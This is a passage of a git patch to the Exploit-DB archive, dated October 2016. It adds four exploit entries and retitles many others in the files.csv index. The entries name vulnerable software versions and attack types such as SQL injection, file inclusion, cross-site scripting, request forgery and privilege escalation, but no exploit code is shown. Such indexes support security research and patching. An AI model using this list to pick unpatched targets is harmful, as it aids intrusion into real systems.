From 8330920f324edbc2b5d508ba117659da5c8701c3 Mon Sep 17 00:00:00 2001 From: Offensive Security Date: Tue, 25 Oct 2016 05:01:17 +0000 Subject: [PATCH] DB: 2016-10-25 4 new exploits ATutor 1.5.3.1 - (links) Blind SQL Injection ATutor 1.5.3.1 - 'links' Blind SQL Injection Mihalism Multi Host 2.0.7 - download.php Remote File Disclosure Mihalism Multi Host 2.0.7 - 'download.php' Remote File Disclosure IBM Domino Web Access Upload Module - inotes6.dll Buffer Overflow IBM Domino Web Access 7.0 Upload Module - inotes6.dll Buffer Overflow WebPortal CMS 0.6.0 - (index.php m) SQL Injection WebPortal CMS 0.6.0 - 'index.php' SQL Injection samPHPweb - 'db.php commonpath' Remote File Inclusion samPHPweb 4.2.2 - 'db.php' Remote File Inclusion samPHPweb - 'songinfo.php' SQL Injection samPHPweb 4.2.2 - 'songinfo.php' SQL Injection ATutor 1.6.1-pl1 - (import.php) Remote File Inclusion ATutor 1.6.1-pl1 - 'import.php' Remote File Inclusion The Matt Wright Guestbook.pl 2.3.1 - Server Side Include The Matt Wright Guestbook.pl 2.3.1 - Server-Side Include html2ps - 'include file' Server Side Include Directive Directory Traversal html2ps - 'include file' Server-Side Include Directive Directory Traversal ClanSphere 2011.3 - (cs_lang cookie Parameter) Local File Inclusion ClanSphere 2011.3 - 'cs_lang' Cookie Parameter Local File Inclusion Imatix Xitami 2.5 - Server Side Includes Cross-Site Scripting Imatix Xitami 2.5 - Server-Side Includes Cross-Site Scripting Flatnux CMS 2013-01.17 - (index.php theme Parameter) Local File Inclusion Flatnux CMS 2013-01.17 - 'index.php' Local File Inclusion Network Weathermap 0.97a - (editor.php) Persistent Cross-Site Scripting Network Weathermap 0.97a - 'editor.php' Persistent Cross-Site Scripting ATutor 1.4.3 - browse.php show_course Parameter Cross-Site Scripting ATutor 1.4.3 - contact.php subject Parameter Cross-Site Scripting ATutor 1.4.3 - content.php cid Parameter Cross-Site Scripting ATutor 1.4.3 - send_message.php l Parameter Cross-Site Scripting ATutor 1.4.3 - search.php Multiple Parameter Cross-Site Scripting ATutor 1.4.3 - inbox/index.php view Parameter Cross-Site Scripting ATutor 1.4.3 - tile.php Multiple Parameter Cross-Site Scripting ATutor 1.4.3 - subscribe_forum.php us Parameter Cross-Site Scripting ATutor 1.4.3 - Directory.php Multiple Parameter Cross-Site Scripting ATutor 1.4.3 - 'browse.php' show_course Parameter Cross-Site Scripting ATutor 1.4.3 - 'contact.php' subject Parameter Cross-Site Scripting ATutor 1.4.3 - 'content.php' cid Parameter Cross-Site Scripting ATutor 1.4.3 - 'send_message.php' l Parameter Cross-Site Scripting ATutor 1.4.3 - 'search.php' Multiple Parameter Cross-Site Scripting ATutor 1.4.3 - 'inbox/index.php' view Parameter Cross-Site Scripting ATutor 1.4.3 - 'tile.php' Multiple Parameter Cross-Site Scripting ATutor 1.4.3 - 'subscribe_forum.php' us Parameter Cross-Site Scripting ATutor 1.4.3 - 'Directory.php' Multiple Parameter Cross-Site Scripting Cuppa CMS - 'alertConfigField.php urlConfig Parameter' Remote / Local File Inclusion Cuppa CMS - 'alertConfigField.php' Remote / Local File Inclusion Novell Zenworks Mobile Device Managment - Local File Inclusion (Metasploit) Novell Zenworks Mobile Device Managment 2.6.1 / 2.7.0 - Local File Inclusion (Metasploit) Weathermap 0.97c - (editor.php mapname Parameter) Local File Inclusion Weathermap 0.97c - 'mapname' Parameter Local File Inclusion ATutor 1.5.1 - password_reminder.php SQL Injection ATutor 1.5.1 - 'password_reminder.php' SQL Injection ATutor 1.x - forum.inc.php Arbitrary Command Execution ATutor 1.x - body_header.inc.php section Parameter Local File Inclusion ATutor 1.x - print.php section Parameter Remote File Inclusion ATutor 1.x - 'forum.inc.php' Arbitrary Command Execution ATutor 1.x - 'body_header.inc.php' section Parameter Local File Inclusion ATutor 1.x - 'print.php' section Parameter Remote File Inclusion ATutor 1.5.x - create_course.php Multiple Parameter Cross-Site Scripting ATutor 1.5.x - documentation/admin/index.php Cross-Site Scripting ATutor 1.5.x - password_reminder.php forgot Parameter Cross-Site Scripting ATutor 1.5.x - users/browse.php cat Parameter Cross-Site Scripting ATutor 1.5.x - 'create_course.php' Multiple Parameter Cross-Site Scripting ATutor 1.5.x - 'documentation/admin/index.php' Cross-Site Scripting ATutor 1.5.x - 'password_reminder.php' forgot Parameter Cross-Site Scripting ATutor 1.5.x - 'users/browse.php' cat Parameter Cross-Site Scripting Zimbra - Privilegie Escalation (via Local File Inclusion) Zimbra 2009-2013 - Local File Inclusion Zimbra Collaboration Server - Local File Inclusion (Metasploit) Zimbra Collaboration Server 7.2.2 / 8.0.2 - Local File Inclusion (Metasploit) Vtiger CRM 5.4.0/6.0 RC/6.0.0 GA - (browse.php file Parameter) Local File Inclusion Vtiger CRM 5.4.0/6.0 RC/6.0.0 GA - 'browse.php' Local File Inclusion Cart Engine 3.0.0 - (task.php) Local File Inclusion Cart Engine 3.0.0 - 'task.php' Local File Inclusion Kemana Directory 1.5.6 - (run Parameter) Local File Inclusion Kemana Directory 1.5.6 - 'task.php' Local File Inclusion Railo - Remote File Inclusion (Metasploit) Railo 4.2.1 - Remote File Inclusion (Metasploit) LittleSite 0.1 - 'file' Parameter Local File Inclusion LittleSite 0.1 - 'index.php' Local File Inclusion OSClass 3.4.1 - (index.php file Parameter) Local File Inclusion OSClass 3.4.1 - 'index.php' Local File Inclusion Magento Server MAGMI Plugin - Remote File Inclusion Magento Server MAGMI Plugin 0.7.17a - Remote File Inclusion Cacti Superlinks Plugin 1.4-2 - Remote Code Execution (via Local File Inclusion + SQL Injection) Cacti Superlinks Plugin 1.4-2 - SQL Injection / Local File Inclusion Lotus Mail Encryption Server (Protector for Mail) - Local File Inclusion to Remote Code Execution (Metasploit) Lotus Mail Encryption Server 2.1.0.1 (Protector for Mail) - Local File Inclusion to Remote Code Execution (Metasploit) u5CMS 3.9.3 - (thumb.php) Local File Inclusion u5CMS 3.9.3 - 'thumb.php' Local File Inclusion openSIS - 'modname' Parameter Local File Inclusion ATutor - 'tool_file' Parameter Local File Inclusion openSIS 5.1 - 'ajax.php' Local File Inclusion ATutor 2.1 - 'tool_file' Parameter Local File Inclusion Fork CMS - 'file' Parameter Local File Inclusion Fork CMS - 'js.php' Local File Inclusion HP Insight Diagnostics - Local File Inclusion HP Insight Diagnostics 9.4.0.4710 - Local File Inclusion phpVibe - Information Disclosure / Remote File Inclusion phpVibe 3.1 - Information Disclosure / Remote File Inclusion CakePHP - AssetDispatcher Class Local File Inclusion CakePHP 2.2.8 / 2.3.7 - AssetDispatcher Class Local File Inclusion TomatoCart - 'install/rpc.php' Local File Inclusion TomatoCart 1.1.8.2 - 'class' Parameter Local File Inclusion NeoBill - /install/index.php language Parameter Traversal Local File Inclusion NeoBill 0.9-alpha - 'language' Parameter Local File Inclusion iScripts AutoHoster - /websitebuilder/showtemplateimage.php tmpid Parameter Traversal Local File Inclusion iScripts AutoHoster - /admin/downloadfile.php fname Parameter Traversal Local File Inclusion iScripts AutoHoster - /support/admin/csvdownload.php id Parameter Traversal Local File Inclusion iScripts AutoHoster - 'tmpid' Parameter Local File Inclusion iScripts AutoHoster - 'fname' Parameter Local File Inclusion iScripts AutoHoster - 'id' Parameter Local File Inclusion AFCommerce - /afcontrol/adblock.php rootpathtocart Parameter Remote File Inclusion AFCommerce - /afcontrol/adminpassword.php rootpathtocart Parameter Remote File Inclusion AFCommerce - /afcontrol/controlheader.php rootpathtocart Parameter Remote File Inclusion AFCommerce - 'adblock.php' Remote File Inclusion AFCommerce - 'adminpassword.php' Remote File Inclusion AFCommerce - 'controlheader.php' Remote File Inclusion xBoard - 'post' Parameter Local File Inclusion xBoard 5.0 / 5.5 / 6.0 - 'view.php' Local File Inclusion BloofoxCMS - /admin/include/inc_settings_editor.php fileurl Parameter Local File Inclusion BloofoxCMS 0.5.0 - 'fileurl' Parameter Local File Inclusion Rips Scanner 0.5 - (code.php) Local File Inclusion Rips Scanner 0.5 - 'code.php' Local File Inclusion MeiuPic - 'ctl' Parameter Local File Inclusion MeiuPic 2.1.2 - 'ctl' Parameter Local File Inclusion qEngine - 'run' Parameter Local File Inclusion qEngine 4.1.6 / 6.0.0 - 'task.php' Local File Inclusion WordPress Plugin BookX - 'includes/bookx_export.php' Local File Inclusion WordPress Plugin BookX 1.7 - 'bookx_export.php' Local File Inclusion Alfresco - /proxy endpoint Parameter Server Side Request Forgery Alfresco - /cmisbrowser url Parameter Server Side Request Forgery Alfresco - /proxy endpoint Parameter Server-Side Request Forgery Alfresco - /cmisbrowser url Parameter Server-Side Request Forgery CMSimple - Remote file Inclusion CMSimple 4.4.4 - Remote file Inclusion VoipSwitch - 'action' Parameter Local File Inclusion VoipSwitch - 'user.php' Local File Inclusion Concrete5 5.7.3.1 - (Application::dispatch) Local File Inclusion Concrete5 5.7.3.1 - 'Application::dispatch' Method Local File Inclusion Axis Communications MPQT/PACS 5.20.x - Server Side Include (SSI) Daemon Remote Format String Axis Communications MPQT/PACS 5.20.x - Server-Side Include (SSI) Daemon Remote Format String vBulletin 5.2.2 - Unauthenticated Server Side Request Forgery vBulletin 5.2.2 - Unauthenticated Server-Side Request Forgery Orange Inventel LiveBox 5.08.3-sp - Cross-Site Request Forgery Microsoft Windows (x86) - 'NDISTAPI' Privilege Escalation (MS11-062) EC-CUBE 2.12.6 - Server-Side Request Forgery Industrial Secure Routers EDR-810 / EDR-G902 / EDR-G903 - Insecure Configuration Management --- files.csv | 148 ++++---- platforms/hardware/webapps/40626.txt | 28 ++ platforms/hardware/webapps/40629.txt | 38 ++ platforms/php/webapps/40628.pl | 89 +++++ platforms/windows/local/40627.c | 538 +++++++++++++++++++++++++++ 5 files changed, 769 insertions(+), 72 deletions(-) create mode 100755 platforms/hardware/webapps/40626.txt create mode 100755 platforms/hardware/webapps/40629.txt create mode 100755 platforms/php/webapps/40628.pl create mode 100755 platforms/windows/local/40627.c diff --git a/files.csv b/files.csv index d3c5d8ad0..18c5a244c 100755 --- a/files.csv +++ b/files.csv @@ -1789,7 +1789,7 @@ id,file,description,date,author,platform,type,port 2085,platforms/php/webapps/2085.txt,"Mambo Colophon Component 1.2 - Remote File Inclusion",2006-07-29,Drago84,php,webapps,0 2086,platforms/php/webapps/2086.txt,"Mambo mambatStaff Component 3.1b - Remote File Inclusion",2006-07-29,Dr.Jr7,php,webapps,0 2087,platforms/php/webapps/2087.php,"vbPortal 3.0.2 <= 3.6.0 b1 - 'cookie' Remote Code Execution",2006-07-29,r00t,php,webapps,0 -2088,platforms/php/webapps/2088.php,"ATutor 1.5.3.1 - (links) Blind SQL Injection",2006-07-30,rgod,php,webapps,0 +2088,platforms/php/webapps/2088.php,"ATutor 1.5.3.1 - 'links' Blind SQL Injection",2006-07-30,rgod,php,webapps,0 2089,platforms/php/webapps/2089.txt,"Mambo User Home Pages Component 0.5 - Remote File Inclusion",2006-07-30,"Kurdish Security",php,webapps,0 2090,platforms/php/webapps/2090.txt,"Joomla! Component com_bayesiannaivefilter 1.1 - Inclusion",2006-07-30,Pablin77,php,webapps,0 2091,platforms/windows/local/2091.cpp,"Microsoft PowerPoint 2003 SP2 - Local Code Execution (French)",2006-07-30,NSRocket,windows,local,0 @@ -4461,13 +4461,13 @@ id,file,description,date,author,platform,type,port 4809,platforms/php/webapps/4809.txt,"CCMS 3.1 Demo - SQL Injection",2007-12-29,Pr0metheuS,php,webapps,0 4810,platforms/php/webapps/4810.txt,"CMS Made Simple 1.2.2 - (TinyMCE module) SQL Injection",2007-12-30,EgiX,php,webapps,0 4811,platforms/php/webapps/4811.txt,"kontakt formular 1.4 - Remote File Inclusion",2007-12-30,bd0rk,php,webapps,0 -4812,platforms/php/webapps/4812.txt,"Mihalism Multi Host 2.0.7 - download.php Remote File Disclosure",2007-12-30,GoLd_M,php,webapps,0 +4812,platforms/php/webapps/4812.txt,"Mihalism Multi Host 2.0.7 - 'download.php' Remote File Disclosure",2007-12-30,GoLd_M,php,webapps,0 4813,platforms/php/webapps/4813.txt,"XCMS 1.83 - Remote Command Execution",2007-12-30,x0kster,php,webapps,0 4814,platforms/php/webapps/4814.txt,"Bitweaver R2 CMS - Arbitrary File Upload / Disclosure",2007-12-30,BugReport.IR,php,webapps,0 4815,platforms/php/webapps/4815.txt,"matpo bilder galerie 1.1 - Remote File Inclusion",2007-12-30,Crackers_Child,php,webapps,0 4816,platforms/php/webapps/4816.txt,"SanyBee Gallery 0.1.1 - (p) Local File Inclusion",2007-12-30,jackal,php,webapps,0 4817,platforms/php/webapps/4817.txt,"w-Agora 4.2.1 - (cat) SQL Injection",2007-12-30,IHTeam,php,webapps,0 -4818,platforms/windows/remote/4818.html,"IBM Domino Web Access Upload Module - inotes6.dll Buffer Overflow",2007-12-30,Elazar,windows,remote,0 +4818,platforms/windows/remote/4818.html,"IBM Domino Web Access 7.0 Upload Module - inotes6.dll Buffer Overflow",2007-12-30,Elazar,windows,remote,0 4819,platforms/windows/remote/4819.html,"Macrovision Installshield - isusweb.dll Overwrite (SEH)",2007-12-30,Elazar,windows,remote,0 4820,platforms/windows/remote/4820.html,"IBM Domino Web Access Upload Module - dwa7w.dll Buffer Overflow",2007-12-30,Elazar,windows,remote,0 4821,platforms/php/webapps/4821.txt,"IPTBB 0.5.4 - (viewdir id) SQL Injection",2007-12-31,MhZ91,php,webapps,0 @@ -4475,7 +4475,7 @@ id,file,description,date,author,platform,type,port 4823,platforms/php/webapps/4823.pl,"ZenPhoto 1.1.3 - (rss.php albumnr) SQL Injection",2007-12-31,Silentz,php,webapps,0 4824,platforms/asp/webapps/4824.py,"oneSCHOOL - admin/login.asp SQL Injection",2007-12-31,Guga360,asp,webapps,0 4825,platforms/windows/remote/4825.html,"Vantage Linguistics AnswerWorks 4 - API ActiveX Control Buffer Overflow",2007-12-31,Elazar,windows,remote,0 -4826,platforms/php/webapps/4826.pl,"WebPortal CMS 0.6.0 - (index.php m) SQL Injection",2007-12-31,x0kster,php,webapps,0 +4826,platforms/php/webapps/4826.pl,"WebPortal CMS 0.6.0 - 'index.php' SQL Injection",2007-12-31,x0kster,php,webapps,0 4827,platforms/php/webapps/4827.txt,"Joomla! Component PU Arcade 2.1.3 - SQL Injection",2007-12-31,Houssamix,php,webapps,0 4828,platforms/php/webapps/4828.txt,"AGENCY4NET WEBFTP 1 - download2.php File Disclosure",2008-01-01,GoLd_M,php,webapps,0 4829,platforms/windows/dos/4829.html,"DivX Player 6.6.0 - ActiveX SetPassword() Denial of Service (PoC)",2008-01-02,anonymous,windows,dos,0 @@ -4483,9 +4483,9 @@ id,file,description,date,author,platform,type,port 4831,platforms/php/webapps/4831.txt,"MyPHP Forum 3.0 - (Final) SQL Injection",2008-01-03,The:Paradox,php,webapps,0 4832,platforms/php/webapps/4832.php,"Site@School 2.4.10 - Blind SQL Injection",2008-01-03,EgiX,php,webapps,0 4833,platforms/php/webapps/4833.txt,"NetRisk 1.9.7 - Remote / Local File Inclusion",2008-01-04,S.W.A.T.,php,webapps,0 -4834,platforms/php/webapps/4834.txt,"samPHPweb - 'db.php commonpath' Remote File Inclusion",2008-01-04,Crackers_Child,php,webapps,0 +4834,platforms/php/webapps/4834.txt,"samPHPweb 4.2.2 - 'db.php' Remote File Inclusion",2008-01-04,Crackers_Child,php,webapps,0 4835,platforms/php/webapps/4835.py,"WebPortal CMS 0.6-beta - Remote Password Change Exploit",2008-01-04,The:Paradox,php,webapps,0 -4836,platforms/php/webapps/4836.txt,"samPHPweb - 'songinfo.php' SQL Injection",2008-01-05,BackDoor,php,webapps,0 +4836,platforms/php/webapps/4836.txt,"samPHPweb 4.2.2 - 'songinfo.php' SQL Injection",2008-01-05,BackDoor,php,webapps,0 4837,platforms/php/webapps/4837.pl,"ClipShare 2.6 - Remote User Password Change Exploit",2008-01-05,Pr0metheuS,php,webapps,0 4838,platforms/php/webapps/4838.txt,"snetworks PHP Classifieds 5.0 - Remote File Inclusion",2008-01-05,Crackers_Child,php,webapps,0 4839,platforms/windows/local/4839.pl,"CoolPlayer 2.17 - '.m3u' Stack Overflow",2008-01-05,Trancek,windows,local,0 @@ -5773,7 +5773,7 @@ id,file,description,date,author,platform,type,port 6150,platforms/php/webapps/6150.txt,"PixelPost 1.7.1 - (language_full) Local File Inclusion",2008-07-28,DSecRG,php,webapps,0 6151,platforms/windows/remote/6151.txt,"velocity Web-Server 1.0 - Directory Traversal",2008-07-28,DSecRG,windows,remote,0 6152,platforms/windows/remote/6152.html,"Trend Micro OfficeScan - ObjRemoveCtrl ActiveX Control Buffer Overflow",2008-07-28,Elazar,windows,remote,0 -6153,platforms/php/webapps/6153.txt,"ATutor 1.6.1-pl1 - (import.php) Remote File Inclusion",2008-07-28,"Khashayar Fereidani",php,webapps,0 +6153,platforms/php/webapps/6153.txt,"ATutor 1.6.1-pl1 - 'import.php' Remote File Inclusion",2008-07-28,"Khashayar Fereidani",php,webapps,0 6154,platforms/php/webapps/6154.txt,"ViArt Shop 3.5 - (category_id) SQL Injection",2008-07-28,"GulfTech Security",php,webapps,0 6155,platforms/hardware/remote/6155.c,"Cisco IOS 12.3(18) FTP Server - Remote Exploit (attached to gdb)",2008-07-29,"Andy Davis",hardware,remote,0 6156,platforms/php/webapps/6156.txt,"Minishowcase 09b136 - 'lang' Local File Inclusion",2008-07-29,DSecRG,php,webapps,0 @@ -9294,7 +9294,7 @@ id,file,description,date,author,platform,type,port 9904,platforms/asp/webapps/9904.txt,"PSArt 1.2 - SQL Injection",2009-10-30,"Securitylab Research",asp,webapps,0 9905,platforms/windows/remote/9905.cpp,"Oracle Database 10.1.0.5 <= 10.2.0.4 - AUTH_SESSKEY Length Validation Remote Buffer Overflow",2009-10-30,"Dennis Yurichev",windows,remote,1521 9906,platforms/php/webapps/9906.rb,"Mambo 4.6.4 - Cache Lite Output Remote File Inclusion (Metasploit)",2008-06-14,MC,php,webapps,0 -9907,platforms/cgi/webapps/9907.rb,"The Matt Wright Guestbook.pl 2.3.1 - Server Side Include",1999-11-05,patrick,cgi,webapps,0 +9907,platforms/cgi/webapps/9907.rb,"The Matt Wright Guestbook.pl 2.3.1 - Server-Side Include",1999-11-05,patrick,cgi,webapps,0 9908,platforms/php/webapps/9908.rb,"BASE 1.2.4 - base_qry_common.php Remote File Inclusion (Metasploit)",2008-06-14,MC,php,webapps,0 9909,platforms/cgi/webapps/9909.rb,"AWStats 6.4 < 6.5 - AllowToUpdateStatsFromBrowser Command Injection (Metasploit)",2006-05-04,patrick,cgi,webapps,0 9911,platforms/php/webapps/9911.rb,"Cacti 0.8.6-d - graph_view.php Command Injection (Metasploit)",2005-01-15,"David Maciejak",php,webapps,0 @@ -9389,7 +9389,7 @@ id,file,description,date,author,platform,type,port 10009,platforms/windows/local/10009.txt,"Free Download Manager Torrent File Parsing - Multiple Remote Buffer Overflow Vulnerabilities (Metasploit)",2009-11-11,"Carsten Eiram",windows,local,0 10010,platforms/windows/local/10010.txt,"Free WMA MP3 Converter 1.1 - '.wav' Local Buffer Overflow",2009-10-09,KriPpLer,windows,local,0 10011,platforms/hardware/remote/10011.txt,"HP LaserJet printers - Multiple Persistent Cross-Site Scripting Vulnerabilities",2009-10-07,"Digital Security Research Group",hardware,remote,80 -10012,platforms/multiple/webapps/10012.py,"html2ps - 'include file' Server Side Include Directive Directory Traversal",2009-09-25,epiphant,multiple,webapps,0 +10012,platforms/multiple/webapps/10012.py,"html2ps - 'include file' Server-Side Include Directive Directory Traversal",2009-09-25,epiphant,multiple,webapps,0 10013,platforms/jsp/webapps/10013.txt,"Hyperic HQ 3.2 < 4.2-beta1 - Multiple Cross-Site Scripting",2009-10-02,CoreLabs,jsp,webapps,0 10016,platforms/php/webapps/10016.pl,"Joomla! Component JForJoomla! Jreservation 1.5 - 'pid' Parameter SQL Injection",2009-11-10,"Chip d3 bi0s",php,webapps,0 10017,platforms/linux/dos/10017.c,"Linux Kernel 2.6.x - 'fput()' Null Pointer Dereference Local Denial of Service",2009-11-09,"David Howells",linux,dos,0 @@ -19472,7 +19472,7 @@ id,file,description,date,author,platform,type,port 22178,platforms/multiple/remote/22178.xml,"Sun ONE Unified Development Server 5.0 - Recursive Document Type Definition",2003-01-15,"Sun Microsystems",multiple,remote,0 22179,platforms/multiple/remote/22179.pl,"CSO Lanifex Outreach Project Tool 0.946b - Request Origin Spoofing",2003-01-16,"Martin Eiszner",multiple,remote,0 22180,platforms/php/webapps/22180.txt,"PHPLinks 2.1.2 - Add Site HTML Injection",2003-01-16,JeiAr,php,webapps,0 -22181,platforms/php/webapps/22181.txt,"ClanSphere 2011.3 - (cs_lang cookie Parameter) Local File Inclusion",2012-10-23,blkhtc0rp,php,webapps,0 +22181,platforms/php/webapps/22181.txt,"ClanSphere 2011.3 - 'cs_lang' Cookie Parameter Local File Inclusion",2012-10-23,blkhtc0rp,php,webapps,0 22182,platforms/php/webapps/22182.pl,"phpBB 2.0.3 - privmsg.php SQL Injection",2003-01-17,"Ulf Harnhammar",php,webapps,0 22183,platforms/linux/dos/22183.c,"GameSpy 3D 2.62 - Packet Amplification Denial of Service",2003-01-17,"Mike Kristovich",linux,dos,0 22184,platforms/windows/remote/22184.pl,"GlobalScape CuteFTP 5.0 - LIST Response Buffer Overflow",2003-03-26,snooq,windows,remote,0 @@ -21539,7 +21539,7 @@ id,file,description,date,author,platform,type,port 24301,platforms/php/webapps/24301.html,"Mensajeitor Tag Board 1.x - Authentication Bypass",2004-07-21,"Jordi Corrales",php,webapps,0 24302,platforms/asp/webapps/24302.pl,"Polar Helpdesk 3.0 - Cookie Based Authentication Bypass",2004-07-21,"Noam Rathaus",asp,webapps,0 24303,platforms/php/webapps/24303.txt,"Layton Technology HelpBox 3.0.1 - Multiple SQL Injections",2004-07-21,"Noam Rathaus",php,webapps,0 -24304,platforms/windows/remote/24304.txt,"Imatix Xitami 2.5 - Server Side Includes Cross-Site Scripting",2004-07-22,"Oliver Karow",windows,remote,0 +24304,platforms/windows/remote/24304.txt,"Imatix Xitami 2.5 - Server-Side Includes Cross-Site Scripting",2004-07-22,"Oliver Karow",windows,remote,0 24305,platforms/multiple/dos/24305.txt,"PSCS VPOP3 2.0 - Email Server Remote Denial of Service",2004-07-22,dr_insane,multiple,dos,0 24306,platforms/php/webapps/24306.txt,"EasyWeb 1.0 FileManager Module - Directory Traversal",2004-07-23,sullo@cirt.net,php,webapps,0 24307,platforms/php/webapps/24307.txt,"PostNuke 0.7x - Install Script Administrator Password Disclosure",2004-07-24,hellsink,php,webapps,0 @@ -22069,7 +22069,7 @@ id,file,description,date,author,platform,type,port 24867,platforms/php/webapps/24867.html,"WordPress Plugin IndiaNIC FAQs Manager 1.0 - Multiple Vulnerabilities",2013-03-22,m3tamantra,php,webapps,0 24868,platforms/php/webapps/24868.rb,"WordPress Plugin IndiaNIC FAQs Manager 1.0 - Blind SQL Injection",2013-03-22,m3tamantra,php,webapps,0 24869,platforms/php/webapps/24869.txt,"AContent 1.3 - Local File Inclusion",2013-03-22,DaOne,php,webapps,0 -24870,platforms/php/webapps/24870.txt,"Flatnux CMS 2013-01.17 - (index.php theme Parameter) Local File Inclusion",2013-03-22,DaOne,php,webapps,0 +24870,platforms/php/webapps/24870.txt,"Flatnux CMS 2013-01.17 - 'index.php' Local File Inclusion",2013-03-22,DaOne,php,webapps,0 24871,platforms/php/webapps/24871.txt,"Slash CMS - Multiple Vulnerabilities",2013-03-22,DaOne,php,webapps,0 24872,platforms/windows/local/24872.txt,"Photodex ProShow Gold/Producer 5.0.3310 / 6.0.3410 - ScsiAccess Privilege Escalation",2013-03-22,"Julien Ahrens",windows,local,0 24873,platforms/php/webapps/24873.txt,"Stradus CMS 1.0beta4 - Multiple Vulnerabilities",2013-03-22,DaOne,php,webapps,0 @@ -22108,7 +22108,7 @@ id,file,description,date,author,platform,type,port 24918,platforms/windows/dos/24918.py,"Personal File Share 1.0 - Denial of Service",2013-04-05,npn,windows,dos,0 24910,platforms/windows/local/24910.txt,"VirtualDJ Pro/Home 7.3 - Buffer Overflow",2013-04-02,"Alexandro Sánchez Bach",windows,local,0 24911,platforms/php/webapps/24911.txt,"Pollen CMS 0.6 - (index.php p Parameter) Local File Disclosure",2013-04-02,MizoZ,php,webapps,0 -24913,platforms/php/webapps/24913.txt,"Network Weathermap 0.97a - (editor.php) Persistent Cross-Site Scripting",2013-04-02,"Daniel Ricardo dos Santos",php,webapps,0 +24913,platforms/php/webapps/24913.txt,"Network Weathermap 0.97a - 'editor.php' Persistent Cross-Site Scripting",2013-04-02,"Daniel Ricardo dos Santos",php,webapps,0 24914,platforms/php/webapps/24914.txt,"WordPress Plugin FuneralPress 1.1.6 - Persistent Cross-Site Scripting",2013-04-02,"Rob Armstrong",php,webapps,0 24915,platforms/multiple/webapps/24915.txt,"Aspen 0.8 - Directory Traversal",2013-04-02,"Daniel Ricardo dos Santos",multiple,webapps,0 24916,platforms/hardware/webapps/24916.txt,"Netgear WNR1000 - Authentication Bypass",2013-04-02,"Roberto Paleari",hardware,webapps,0 @@ -23019,15 +23019,15 @@ id,file,description,date,author,platform,type,port 25813,platforms/hardware/webapps/25813.txt,"MayGion IP Cameras Firmware 09.27 - Multiple Vulnerabilities",2013-05-29,"Core Security",hardware,webapps,0 25814,platforms/windows/remote/25814.rb,"IBM SPSS SamplePower C1Tab - ActiveX Heap Overflow (Metasploit)",2013-05-29,Metasploit,windows,remote,0 25815,platforms/hardware/webapps/25815.txt,"Zavio IP Cameras Firmware 1.6.03 - Multiple Vulnerabilities",2013-05-29,"Core Security",hardware,webapps,0 -25826,platforms/php/webapps/25826.txt,"ATutor 1.4.3 - browse.php show_course Parameter Cross-Site Scripting",2005-06-16,Lostmon,php,webapps,0 -25827,platforms/php/webapps/25827.txt,"ATutor 1.4.3 - contact.php subject Parameter Cross-Site Scripting",2005-06-16,Lostmon,php,webapps,0 -25828,platforms/php/webapps/25828.txt,"ATutor 1.4.3 - content.php cid Parameter Cross-Site Scripting",2005-06-16,Lostmon,php,webapps,0 -25829,platforms/php/webapps/25829.txt,"ATutor 1.4.3 - send_message.php l Parameter Cross-Site Scripting",2005-06-16,Lostmon,php,webapps,0 -25830,platforms/php/webapps/25830.txt,"ATutor 1.4.3 - search.php Multiple Parameter Cross-Site Scripting",2005-06-16,Lostmon,php,webapps,0 -25831,platforms/php/webapps/25831.txt,"ATutor 1.4.3 - inbox/index.php view Parameter Cross-Site Scripting",2005-06-16,Lostmon,php,webapps,0 -25832,platforms/php/webapps/25832.txt,"ATutor 1.4.3 - tile.php Multiple Parameter Cross-Site Scripting",2005-06-16,Lostmon,php,webapps,0 -25833,platforms/php/webapps/25833.txt,"ATutor 1.4.3 - subscribe_forum.php us Parameter Cross-Site Scripting",2005-06-16,Lostmon,php,webapps,0 -25834,platforms/php/webapps/25834.txt,"ATutor 1.4.3 - Directory.php Multiple Parameter Cross-Site Scripting",2005-06-16,Lostmon,php,webapps,0 +25826,platforms/php/webapps/25826.txt,"ATutor 1.4.3 - 'browse.php' show_course Parameter Cross-Site Scripting",2005-06-16,Lostmon,php,webapps,0 +25827,platforms/php/webapps/25827.txt,"ATutor 1.4.3 - 'contact.php' subject Parameter Cross-Site Scripting",2005-06-16,Lostmon,php,webapps,0 +25828,platforms/php/webapps/25828.txt,"ATutor 1.4.3 - 'content.php' cid Parameter Cross-Site Scripting",2005-06-16,Lostmon,php,webapps,0 +25829,platforms/php/webapps/25829.txt,"ATutor 1.4.3 - 'send_message.php' l Parameter Cross-Site Scripting",2005-06-16,Lostmon,php,webapps,0 +25830,platforms/php/webapps/25830.txt,"ATutor 1.4.3 - 'search.php' Multiple Parameter Cross-Site Scripting",2005-06-16,Lostmon,php,webapps,0 +25831,platforms/php/webapps/25831.txt,"ATutor 1.4.3 - 'inbox/index.php' view Parameter Cross-Site Scripting",2005-06-16,Lostmon,php,webapps,0 +25832,platforms/php/webapps/25832.txt,"ATutor 1.4.3 - 'tile.php' Multiple Parameter Cross-Site Scripting",2005-06-16,Lostmon,php,webapps,0 +25833,platforms/php/webapps/25833.txt,"ATutor 1.4.3 - 'subscribe_forum.php' us Parameter Cross-Site Scripting",2005-06-16,Lostmon,php,webapps,0 +25834,platforms/php/webapps/25834.txt,"ATutor 1.4.3 - 'Directory.php' Multiple Parameter Cross-Site Scripting",2005-06-16,Lostmon,php,webapps,0 25835,platforms/windows/remote/25835.html,"Logic Print 2013 - Stack Overflow (vTable Overwrite)",2013-05-30,h1ch4m,windows,remote,0 25836,platforms/windows/remote/25836.py,"Intrasrv Simple Web Server 1.0 - SEH Based Remote Code Execution",2013-05-30,xis_one,windows,remote,0 25837,platforms/linux/dos/25837.txt,"Monkey HTTPD 1.1.1 - Crash (PoC)",2013-05-30,"Doug Prostko",linux,dos,0 @@ -23167,7 +23167,7 @@ id,file,description,date,author,platform,type,port 25968,platforms/hardware/webapps/25968.pl,"Seowonintech Routers fw: 2.3.9 - Remote Root File Disclosure",2013-06-05,"Todor Donev",hardware,webapps,0 25969,platforms/hardware/webapps/25969.txt,"Netgear WPN824v3 - Unauthorized Config Download",2013-06-05,"Jens Regel",hardware,webapps,0 25970,platforms/linux/remote/25970.py,"Exim - sender_address Parameter Remote Code Execution",2013-06-05,eKKiM,linux,remote,0 -25971,platforms/php/webapps/25971.txt,"Cuppa CMS - 'alertConfigField.php urlConfig Parameter' Remote / Local File Inclusion",2013-06-05,"CWH Underground",php,webapps,0 +25971,platforms/php/webapps/25971.txt,"Cuppa CMS - 'alertConfigField.php' Remote / Local File Inclusion",2013-06-05,"CWH Underground",php,webapps,0 25972,platforms/windows/dos/25972.py,"PEStudio 3.69 - Denial of Service",2013-06-05,"Debasish Mandal",windows,dos,0 25973,platforms/php/webapps/25973.txt,"Ruubikcms 